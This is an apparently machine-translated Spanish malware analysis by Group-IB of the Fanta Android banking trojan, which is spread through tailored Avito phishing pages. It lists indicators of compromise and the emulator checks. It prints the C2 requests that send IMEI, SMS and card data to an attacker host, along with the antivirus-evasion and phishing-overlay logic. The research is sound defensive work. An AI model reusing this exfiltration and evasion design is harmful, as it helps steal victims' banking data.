Leisya, Fanta: una nueva táctica para un viejo troyano de Android

Una vez que desee vender algo en Avito y, después de haber presentado una descripción detallada de su producto (por ejemplo, un módulo RAM), recibirá este mensaje:

Cuando abra el enlace, verá una página bastante inocua que le notifica a usted, un vendedor feliz y exitoso, de la compra:


Después de hacer clic en el botón "Continuar", se descargará un archivo APK con el ícono y el nombre confiable en su dispositivo Android. Instalaste una aplicación que por alguna razón solicitó los derechos de AccessibilityService, luego aparecieron un par de ventanas que desaparecieron rápidamente y ... Eso es todo.

Usted ingresa para verificar su saldo, pero por alguna razón su aplicación bancaria nuevamente solicita los detalles de su tarjeta. Después de ingresar los datos, sucede algo terrible: por alguna razón que aún no está clara para usted, el dinero comienza a desaparecer de su cuenta. Está tratando de resolver el problema, pero su teléfono se resiste: presiona las teclas "Atrás" y "Inicio", no se apaga y no permite activar ningún medio de protección. Como resultado, te quedas sin dinero, tus bienes no han sido comprados, estás confundido y te preguntas: ¿qué pasó?

La respuesta es simple: eres víctima del troyano Fanta de Android, la familia Flexnet. ¿Cómo sucedió eso? Te lo explicaremos ahora.

Autores: Andrey Polovinkin , Especialista Junior en Análisis de Código Malicioso, Ivan Pisarev , Especialista en Análisis de Código Malicioso.

Algunas estadísticas

Por primera vez, la familia de troyanos Android Flexnet se hizo conocida en 2015. Durante un período de actividad bastante largo, la familia se expandió a varias subespecies: Fanta, Limebot, Lipton, etc. El troyano, así como la infraestructura asociada con él, no se detiene: se están desarrollando nuevos esquemas de distribución efectivos, en nuestro caso, páginas de phishing de alta calidad dirigidas a un usuario-vendedor específico, y los desarrolladores del troyano siguen las tendencias de moda en la escritura de virus: agregue nuevas características que le permitan robar de manera más efectiva dinero de dispositivos infectados y mecanismos de protección de derivación.

La campaña descrita en este artículo está dirigida a usuarios de Rusia, se detectó un pequeño número de dispositivos infectados en Ucrania, y aún menos en Kazajstán y Bielorrusia.

A pesar de que Flexnet ha estado en la arena de los troyanos de Android durante más de 4 años y ha sido estudiado en detalle por muchos investigadores, todavía está en buena forma. A partir de enero de 2019, la cantidad potencial de daño es de más de 35 millones de rublos, y esto es solo para campañas en Rusia. En 2015, se vendieron varias versiones de este troyano de Android en foros subterráneos, donde también se podía encontrar el código fuente del troyano con una descripción detallada. Y esto significa que las estadísticas de daños en el mundo son aún más impresionantes. Un buen indicador para un hombre tan viejo, ¿verdad?

De vender a engañar

Como puede ver en la captura de pantalla de la página de phishing para el servicio de Internet para colocar anuncios Avito presentados anteriormente, fue preparado para una víctima específica. Aparentemente, los atacantes usan uno de los analizadores Avito, sacando el número de teléfono y el nombre del vendedor, así como una descripción del producto. Después de que la página se expande y se prepara el archivo APK, se envía un mensaje SMS a la víctima con su nombre y un enlace a la página de phishing que contiene una descripción de su producto y la cantidad recibida de la "venta" del producto. Al hacer clic en el botón, el usuario recibe un archivo APK malicioso: Fanta.

Un examen del dominio shcet491 [.] Ru mostró que fue delegado a los servidores DNS de Hostinger:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

El archivo de zona de dominio contiene entradas que apuntan a las direcciones IP 31.220.23 [.] 236, 31.220.23 [.] 243 y 31.220.23 [.] 235. Sin embargo, el registro de recursos maestro de dominio (registro A) apunta a un servidor con una dirección IP de 178.132.1 [.] 240.

La dirección IP 178.132.1 [.] 240 se encuentra en los Países Bajos y pertenece al proveedor de WorldStream. Las direcciones IP 31.220.23 [.] 235, 31.220.23 [.] 236 y 31.220.23 [.] 243 se encuentran en el Reino Unido y pertenecen al servidor de alojamiento compartido HOSTINGER. Openprov-ru se utiliza como registrador. Los siguientes dominios también se resolvieron en la dirección IP 178.132.1 [.] 240:

• sdelka-ru [.] ru
• tovar-av [.] ru
• av-tovar [.] ru
• ru-sdelka [.] ru
• shcet382 [.] ru
• sdelka221 [.] ru
• sdelka211 [.] ru
• vyplata437 [.] ru
• viplata291 [.] ru
• perevod273 [.] ru
• perevod901 [.] ru

Cabe señalar que casi todos los dominios tenían enlaces del siguiente formato:

http: // (www.) {0,1} <% dominio%> / [0-9] {7}

Un enlace de un mensaje SMS también se incluye en esta plantilla. Según datos históricos, se encontró que un enlace corresponde a varios enlaces de acuerdo con la plantilla anterior, lo que indica el uso de un dominio para distribuir el troyano a varias víctimas.

Avancemos un poco más adelante: como servidor de control, el troyano descargado a través de un enlace de SMS utiliza la dirección onuseseddohap [.] Club . Este dominio se registró el 12/03/2019 y, a partir del 29/04/2019, las aplicaciones APK interactuaron con este dominio. Según los datos recibidos de VirusTotal, un total de 109 aplicaciones interactuaron con este servidor. El dominio en sí se resolvió en la dirección IP 217.23.14 [.] 27 , ubicada en los Países Bajos y propiedad del proveedor WorldStream. El namecheap se utiliza como registrador. Los dominios bad-racoon [.] Club (a partir de 2018-09-25) y bad-racoon [.] Live (a partir de 2018-10-25) también se resolvieron en esta dirección IP. Más de 80 archivos APK interactuaron con el dominio Bad-racoon [.] Club , más de 100 interactuaron con el dominio bad-racoon [.] Live .

En general, el progreso del ataque es el siguiente:

¿Qué tiene Fanta debajo del capó?

Al igual que muchos otros troyanos de Android, Fanta puede leer y enviar mensajes SMS, hacer solicitudes de USSD, mostrar sus propias ventanas en la parte superior de las aplicaciones (incluidas las bancarias). Sin embargo, llegó el arsenal de funcionalidad de esta familia: Fanta comenzó a usar el AccessibilityService para diferentes propósitos: leer el contenido de las notificaciones de otras aplicaciones, evitar la detección y detener la ejecución del troyano en un dispositivo infectado, etc. Fanta funciona en todas las versiones de Android no menores de 4.4. En este artículo, veremos más de cerca la siguiente muestra de Fanta:

• MD5 : 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1 : ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256 : df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Inmediatamente después del lanzamiento

Inmediatamente después del lanzamiento, el troyano oculta su ícono. La operación de la aplicación solo es posible si el nombre del dispositivo infectado no está en la lista:

• android_x86
• Virtualbox
• Nexus 5X (cabeza de toro)
• Nexus 5 (maquinilla de afeitar)

Esta comprobación se realiza en el servicio principal del troyano - MainService . Al principio, los parámetros de configuración de la aplicación se inicializan con valores predeterminados (el formato de almacenamiento de los datos de configuración y su valor se analizarán más adelante), así como el registro de un nuevo dispositivo infectado en el servidor de administración. Se enviará una solicitud HTTP POST al servidor con el tipo de mensaje register_bot e información sobre el dispositivo infectado (versión de Android, IMEI, número de teléfono, nombre del operador y código de país del operador en el que está registrado). La dirección del servidor es hXXp: // onuseseddohap [.] Club / controller.php . En respuesta, el servidor envía un mensaje que contiene los campos bot_id , bot_pwd , server : la aplicación guarda estos valores como parámetros del servidor CnC. El parámetro del servidor es opcional si el campo no se recibió: Fanta usa la dirección de registro: hXXp: // onuseseddohap [.] Club / controller.php . La función de cambiar la dirección de CnC se puede usar para resolver dos problemas: distribuir uniformemente la carga entre varios servidores (con una gran cantidad de dispositivos infectados, la carga en un servidor web no optimizado puede ser alta), y también usar un servidor alternativo en caso de falla de uno de los servidores de CnC .

Si se produjo un error al enviar la solicitud, el troyano repetirá el proceso de registro después de 20 segundos.

Después de registrar con éxito el dispositivo, Fanta mostrará el siguiente mensaje al usuario:


Nota importante: un servicio llamado Seguridad del sistema es el nombre del servicio troyano, y después de hacer clic en el botón Aceptar, se abre una ventana con la configuración de Accesibilidad del dispositivo infectado, donde el usuario debe emitir los derechos de Accesibilidad para el servicio malicioso:


Tan pronto como el usuario enciende el AccessibilityService , Fanta obtiene acceso a los contenidos de las ventanas de la aplicación y las acciones realizadas en ellas:


Inmediatamente después de recibir los derechos de Accesibilidad, el troyano solicita derechos de administrador y el derecho de leer las notificaciones:


Usando el AccessibilityService, la aplicación simula las pulsaciones de teclas, otorgándose todos los derechos necesarios.

Fanta crea varias instancias de base de datos (que se describirán más adelante) que son necesarias para guardar los datos de configuración, así como la información sobre el dispositivo infectado recopilada durante el proceso. Para enviar la información recopilada, el troyano crea una tarea repetitiva diseñada para descargar campos de la base de datos y recibir un comando del servidor de control. El intervalo para acceder a CnC se establece según la versión de Android: en el caso de 5.1, el intervalo será de 10 segundos, de lo contrario, 60 segundos.

Para recibir un comando, Fanta realiza una solicitud GetTask al servidor de administración. En respuesta, CnC puede enviar uno de los siguientes comandos:
Fanta también recopila notificaciones de 70 aplicaciones bancarias, sistemas de pago rápido y billeteras electrónicas y las almacena en una base de datos.

Almacenamiento de ajustes de configuración

Para almacenar los parámetros de configuración, Fanta utiliza el enfoque estándar para la plataforma Android: archivos de preferencias . La configuración se guardará en un archivo llamado configuración . La descripción de los parámetros guardados se encuentra en la tabla a continuación.
Fanta también usa el archivo smsManager :

Interacción de base de datos

En el proceso de su trabajo, el troyano utiliza dos bases de datos. Una base de datos llamada a se usa para almacenar diversa información recopilada del teléfono. La segunda base de datos se llama fanta.db y se usa para guardar la configuración responsable de crear ventanas de phishing diseñadas para recopilar información sobre tarjetas bancarias.

El troyano utiliza una base de datos para almacenar la información que recopila y para registrar sus acciones. Los datos se almacenan en la tabla de registros . Para crear una tabla, use la siguiente consulta SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer) 

La base de datos contiene la siguiente información:

1. Iniciar sesión para incluir un dispositivo infectado con el mensaje ¡ Teléfono encendido!

2. Notificaciones de las aplicaciones. El mensaje se forma de acuerdo con la siguiente plantilla:

 (<%App Name%>)<%Title%>: <%Notification text%> 

3. Datos de la tarjeta bancaria de los formularios de phishing de Troya. El parámetro VIEW_NAME puede ser uno de la lista:

• AliExpress
• Avito
• Google play
• Varios <% Nombre de la aplicación%>

El mensaje se registra en el formato:

 [<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>)  :<%CARD_NUMBER%>; :<%MONTH%>/<%YEAR%>; CVV: <%CVV%> 

4. Mensajes SMS entrantes / salientes en el formato:

 ([<%Time in format HH:mm:ss dd.MM.yyyy%>] : /) <%Mobile number%>:<%SMS-text%> 

5. Información sobre el paquete que crea el cuadro de diálogo en el formato:

 (<%Package name%>)<%Package information%> 

Ejemplo de tabla de registros :


Una de las características de Fanta es la recopilación de información de tarjetas bancarias. La recopilación de datos se produce debido a la creación de ventanas de phishing al abrir aplicaciones bancarias. El troyano crea una ventana de phishing solo una vez. La información de que la ventana se mostró al usuario se almacena en la tabla de configuración en la base de datos fanta.db . La siguiente consulta SQL se usa para crear la base de datos:

 create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer); 

Todos los campos de la tabla de configuración se inicializan de manera predeterminada en 1 (crear una ventana de phishing). Después de que el usuario ingrese sus datos, el valor se establecerá en 0. Campos de ejemplo de la tabla de configuración :

• can_login : el campo es responsable de mostrar el formulario al abrir una aplicación bancaria
• first_bank - no utilizado
• can_avito : el campo es responsable de mostrar el formulario al abrir la aplicación Avito
• can_ali : el campo es responsable de mostrar el formulario al abrir la aplicación Aliexpress
• can_another : el campo es responsable de mostrar el formulario al abrir cualquier aplicación de la lista: Yula, Pandao, Drome Auto, Wallet. Tarjetas de descuento y bonificación, Aviasales, Reservas, Trivago
• can_card : el campo es responsable de mostrar el formulario al abrir Google Play

Interacción del servidor de administración

La comunicación de red con el servidor de administración se realiza a través de HTTP. Fanta usa la popular biblioteca Retrofit para trabajar con la red. Las solicitudes se envían a hXXp: // onuseseddohap [.] Club / controller.php . La dirección del servidor se puede cambiar durante el registro en el servidor. Una cookie puede provenir del servidor. Fanta ejecuta las siguientes solicitudes del servidor:

• El bot se registra en el servidor de administración una vez al primer inicio. Los siguientes datos sobre el dispositivo infectado se envían al servidor:
  · Cookies : cookies recibidas del servidor (el valor predeterminado es una cadena vacía)
  · Modo : cadena constante register_bot
  Prefijo - entero constante 2
  · Version_sdk : generado por el siguiente patrón: <% Build.MODEL%> / <% Build.VERSION.RELEASE%> (Avit)
  Imei - IMEI del dispositivo infectado
  · País : código del país en el que está registrado el operador, en formato ISO
  · Número : número de teléfono
  · Operador : nombre del operador
  
  Un ejemplo de una solicitud enviada al servidor:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%> 

  
  En respuesta a la solicitud, el servidor debe devolver un objeto JSON que contenga los siguientes parámetros:
  · Bot_id : identificador del dispositivo infectado. Si bot_id es 0, Fanta volverá a ejecutar la solicitud.
  · Bot_pwd : contraseña para el servidor.
  · Servidor : la dirección del servidor de administración. Parámetro opcional Si no se especifica el parámetro, se utilizará la dirección almacenada en la aplicación.
  
  Ejemplo de objeto JSON:
  
  

   { "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" } 

• Solicitud para recibir un comando del servidor. Los siguientes datos se envían al servidor:
  · Cookies : cookies recibidas del servidor
  · Oferta : identificación del dispositivo infectado que se recibió al enviar la solicitud register_bot
  · Pwd: contraseña para el servidor
  · Divice_admin : el campo determina si se han obtenido los derechos de administrador. Si se obtuvieron derechos de administrador, el campo es 1 , de lo contrario 0
  · Accesibilidad : el estado del servicio de accesibilidad. Si se inició el servicio, el valor es 1 , de lo contrario 0
  · SMSManager : muestra si el troyano está activado como la aplicación predeterminada para recibir SMS
  · Pantalla : muestra el estado de la pantalla. Se establecerá en 1 si la pantalla está encendida, de lo contrario 0 ;
  
  Un ejemplo de una solicitud enviada al servidor:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%> 

  
  Dependiendo del comando, el servidor puede devolver un objeto JSON con diferentes parámetros:
  
  · Comando Enviar mensaje SMS : los parámetros contienen el número de teléfono, el texto del mensaje SMS y el identificador del mensaje que se enviará. El identificador se utiliza al enviar un mensaje al servidor con el tipo setSmsStatus .
  
  

   { "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" } 

  
  · Realizar una llamada telefónica o comando USSD : el número de teléfono o comando viene en el cuerpo de la respuesta.
  
  

   { "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" } 

  
  · Comando Cambiar el parámetro de intervalo .
  
  

   { "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" } 

  
  · Comando Cambiar el parámetro de intercepción .
  
  

   { "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" } 

  
  · El comando de campo Cambiar SmsManager .
  
  

   { "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" } 

  
  · Comando Recopilar mensajes SMS de un dispositivo infectado .
  
  

   { "response": [ { "mode": 9 } ], "status":"ok" } 

  
  · Restablecer el teléfono al comando de configuración de fábrica :
  
  

   { "response": [ { "mode": 11 } ], "status":"ok" } 

  
  · Parámetro de cambio de comando ReadDialog .
  
  

   { "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" } 

• Enviar un mensaje con el tipo setSmsStatus . Esta solicitud se lleva a cabo después del comando Enviar SMS . La solicitud es la siguiente:

 POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%> 

• Enviar contenido de la base de datos. Para una solicitud, se transmite una línea. Los siguientes datos se envían al servidor:
  · Cookies : cookies recibidas del servidor
  · Modo : constante de cadena setSaveInboxSms
  · Oferta : identificación del dispositivo infectado que se recibió al enviar la solicitud register_bot
  · Texto : texto en el registro actual de la base de datos (campo d de la tabla de registros en la base de datos a )
  · Número : nombre del registro de la base de datos actual (campo p de los registros de la tabla en la base de datos a )
  Sms_mode : valor entero (campo m de los registros de la tabla en la base de datos a )
  
  La solicitud es la siguiente:
  
  

   POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%> 

  
  Al enviar con éxito al servidor, la fila se eliminará de la tabla. Un ejemplo del objeto JSON devuelto por el servidor:
  
  

   { "response":[], "status":"ok" } 

Interacción con el servicio de accesibilidad

AccessibilityService se implementó para facilitar el uso de dispositivos Android por personas con discapacidades. En la mayoría de los casos, se requiere interacción física para interactuar con la aplicación. AccessibilityService le permite realizarlos mediante programación. Fanta utiliza el servicio para crear ventanas falsas en aplicaciones bancarias y evitar la apertura de la configuración del sistema y algunas aplicaciones.

Usando la funcionalidad del AccessibilityService, el troyano monitorea los cambios en los elementos en la pantalla de un dispositivo infectado. Como se describió anteriormente, en la configuración de Fanta hay un parámetro responsable de las operaciones de registro con cuadros de diálogo: readDialog . Si se establece este parámetro, se agregará a la base de datos información sobre el nombre y la descripción del paquete que activó el evento. El troyano realiza las siguientes acciones cuando se desencadenan eventos:

• Simula las pulsaciones del teclado hacia atrás y hacia el hogar en caso de:
  · Si el usuario quiere reiniciar su dispositivo
  · Si el usuario desea eliminar la aplicación "Avito" o cambiar los derechos de acceso
  · Si la página menciona la aplicación "Avito"
  · Cuando abres la aplicación "Protección de Google Play"
  · Al abrir páginas con la configuración de AccessibilityService
  · Cuando aparece el cuadro de diálogo "Seguridad del sistema"
  · Al abrir la página con la configuración "Dibujar sobre otra aplicación"
  · Cuando abre la página “Aplicaciones”, “Restaurar y restablecer”, “Restablecer datos”, “Restablecer configuración”, “Panel del desarrollador”, “Especial. Oportunidades "," Accesibilidad "," Derechos especiales "
  · Si el evento fue generado por ciertas aplicaciones.
  
  
  Lista de aplicaciones

  • androide
  • Master lite
  • Maestro limpio
  • Clean Master para CPU x86
  • Gestión de permisos de aplicación Meizu
  • MIUI Security
  • Clean Master - Antivirus y caché de limpieza y basura
  • Control parental y GPS: Kaspersky SafeKids
  • Kaspersky Antivirus AppLock y Web Security Beta
  • Virus Cleaner, Antivirus, Cleaner (MAX Security)
  • Mobile AntiVirus Security PRO
  • Avast antivirus y protección gratuita 2019
  • Seguridad móvil MegaFon
  • Protección AVG para Xperia
  • Seguridad móvil
  • Malwarebytes Antivirus y Protección
  • Antivirus en Android 2019
  • Security Master - Antivirus, VPN, AppLock, Booster
  • AVG antivirus para tableta Huawei System Manager
  • Accesibilidad de Samsung
  • Samsung Smart Manager
  • Maestro de seguridad
  • Refuerzo de velocidad
  • Dr.Web
  • Dr.Web Security Space
  • Centro de control móvil Dr.Web
  • Dr.Web Security Space Life
  • Centro de control móvil Dr.Web
  • Antivirus y seguridad móvil
  • Kaspersky Internet Security: antivirus y protección
  • Kaspersky Battery Life: Saver & Booster
  • Kaspersky Endpoint Security - protección y gestión
  • AVG Antivirus gratis 2019 - Protección para Android
  • Antivirus Android
  • Norton Mobile Security y Antivirus
  • Antivirus, Firewall, VPN, Seguridad móvil
  • Seguridad móvil: antivirus, VPN, antirrobo
  • Antivirus para Android

  
  
• Si se solicita permiso al enviar un mensaje SMS a un número corto, Fanta imita hacer clic en la casilla de verificación Recordar selección y botón de enviar .
• Cuando intenta quitar los derechos de administrador del troyano, bloquea la pantalla del teléfono.
• Impide la incorporación de nuevos administradores.
• Si la aplicación antivirus dr.web detecta una amenaza, Fanta imita un clic en el botón ignorar .
• Un troyano imita hacer clic en un botón para regresar a casa si la aplicación Samsung Device Care generó un evento.
• Fanta crea ventanas de phishing con formularios para ingresar información sobre tarjetas bancarias si se inició una aplicación desde una lista que incluye alrededor de 30 servicios de Internet diferentes. Entre ellos: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, etc.
  
  

  Formas de phishing

  
  Fanta analiza qué aplicaciones se ejecutan en el dispositivo infectado. Si se abrió una aplicación de interés, el troyano muestra una ventana de phishing sobre todas las demás, que es un formulario para ingresar información sobre una tarjeta bancaria. El usuario debe ingresar los siguientes datos:
  
  • Número de tarjeta
  • Fecha de vencimiento de la tarjeta
  • CVV
  • Nombre del titular de la tarjeta (no para todos los bancos)
  
  Dependiendo de la aplicación en ejecución, se mostrarán diferentes ventanas de phishing. Lo siguiente proporcionará ejemplos de algunos de ellos:
  
  AliExpress:
  
  
  
  
  Avito:
  
  
  
  
  Para algunas otras aplicaciones, por ejemplo, Google Play Market, Aviasales, Pandao, Booking, Trivago:
  
  
  
  
  

  Como era realmente
  

  
  Afortunadamente, la persona que recibió el mensaje SMS descrito al comienzo del artículo resultó ser un especialista en el campo de la ciberseguridad. Por lo tanto, la versión real, no directiva, difiere de la que se dijo anteriormente: la persona recibió un SMS interesante, después de lo cual se lo entregó al equipo de Inteligencia de caza de amenazas del Grupo IB. El resultado del ataque es este artículo. Final feliz, ¿verdad? Sin embargo, no todas las historias terminan tan bien, y para que la suya no se parezca a la versión de director con una pérdida de dinero, en la mayoría de los casos es suficiente cumplir con las siguientes reglas, descritas desde hace mucho tiempo:
  
  • no instale aplicaciones para un dispositivo móvil con sistema operativo Android desde ninguna fuente que no sea Google Play
  • Al instalar la aplicación, preste especial atención a los derechos solicitados por la aplicación
  • prestar atención a la extensión de archivo
  • instalar regularmente actualizaciones del sistema operativo Android
  • No visite recursos sospechosos y no descargue archivos desde allí.
  • No siga los enlaces recibidos en los mensajes SMS.
  
  
  Group-IB sabe todo sobre el cibercrimen, pero cuenta las cosas más interesantes.
  
  El canal Telegram lleno de acción (https://t.me/Group_IB) sobre seguridad de la información, piratas informáticos y ataques cibernéticos, piratas informáticos y piratas de Internet. Investigaciones del cibercrimen sensacional por pasos, casos prácticos utilizando tecnologías del Grupo IB y, por supuesto, recomendaciones sobre cómo evitar convertirse en una víctima en Internet.
  
  Canal de YouTube aquí
  Grupo-IB Photowire en Instagram www.instagram.com/group_ib
  Noticias breves de Twitter twitter.com/GroupIB
  
  Group-IB es uno de los desarrolladores líderes de soluciones para detectar y prevenir ataques cibernéticos, detectar fraudes y proteger la propiedad intelectual en una red con sede en Singapur.